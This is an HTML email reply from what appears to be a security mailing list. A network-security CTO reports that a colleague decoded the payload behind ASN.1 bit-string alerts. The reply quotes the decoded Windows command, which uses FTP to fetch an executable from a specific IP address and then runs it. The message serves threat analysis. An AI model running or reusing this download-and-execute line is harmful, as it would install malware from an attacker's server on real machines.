<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
    <meta content="text/html; charset=ISO-8859-1"
      http-equiv="Content-Type">
  </head>
  <body bgcolor="#ffffff" text="#000000">
    On 2/2/11 12:53 PM, Joe Gedeon wrote:
    <blockquote
      cite="mid:AANLkTinppGN1DmJ6qJZuZ4DtTiiTKAGFafCFvaQniNXb@...11828..."
      type="cite">
      <pre wrap="">Has anyone else noticed an increase in the number of alerts for
SPECIFIC-THREATS ASN.1 constructed bit string?  The payload seems
different than the kill-bill script.

</pre>
    </blockquote>
    yep, over the weekend.<br>
    one of our new guys decided to decode it, and got this:<br>
    <br>
    <span style="font-size: 11pt; font-family:
      "Calibri","sans-serif"; color: rgb(31, 73,
      125);"> combined the payloads from the ASN.1 and the NOOPs,
      decoded it and found the following command buried in the overflow
      padding….</span>
    <p class="MsoNormal"><span style="font-size: 11pt; font-family:
        "Calibri","sans-serif"; color: rgb(31, 73,
        125);"> </span></p>
    <p class="MsoNormal" style="margin-bottom: 10pt; line-height: 115%;"><span
        style="font-size: 11pt; line-height: 115%; font-family:
        "Calibri","sans-serif"; color: rgb(31, 73,
        125);">  </span><span style="font-size: 11pt; line-height:
        115%; font-family: "Calibri","sans-serif";"
        lang="EN">cmd /c echo open 210.134.62.199 21 > o&echo
        user 1 1 >> o &echo get Rewetsr.exe >> o
        &echo quit >> o &ftp -n -s:o &Rewetsr.exe</span></p>
    <p class="MsoNormal" style="margin-bottom: 10pt; line-height: 115%;"><span
        style="font-size: 11pt; line-height: 115%; font-family:
        "Calibri","sans-serif";" lang="EN"> </span></p>
    <p class="MsoNormal"><span style="font-size: 11pt; font-family:
        "Calibri","sans-serif"; color: rgb(31, 73,
        125);"><br>
      </span></p>
    <br>
    <br>
    <br>
    <div class="moz-signature">-- <br>
      Michael Scheidell, CTO<br>
      o: 561-999-5000<br>
      d: 561-948-2259<br>
      ISN: 1259*1300<br>
      <font color="#999999">></font><font color="#cc0000"> <b>| </b></font>SECNAP
      Network Security Corporation
      <style type="text/css">
<!--
.unnamed1 {
        margin: 1em;
        padding: 1px;
} -->
</style>
      <ul class="unnamed1">
        <li>Certified SNORT Integrator</li>
        <li>2008-9 Hot Company Award Winner, World Executive Alliance</li>
        <li>Five-Star Partner Program 2009, VARBusiness</li>
        <li>Best in Email Security,2010: Network Products Guide</li>
        <li>King of Spam Filters, SC Magazine 2008</li>
      </ul>
    </div>
  
<br>
<div id="disclaimer.secnap.com"><hr />
<p>This email has been scanned and certified safe by SpammerTrap®.
<br />For Information please see
<a href="http://www.secnap.com/products/spammertrap/">http://www.secnap.com/products/spammertrap/</a></p> <hr /></div>
<br>
</body>
</html>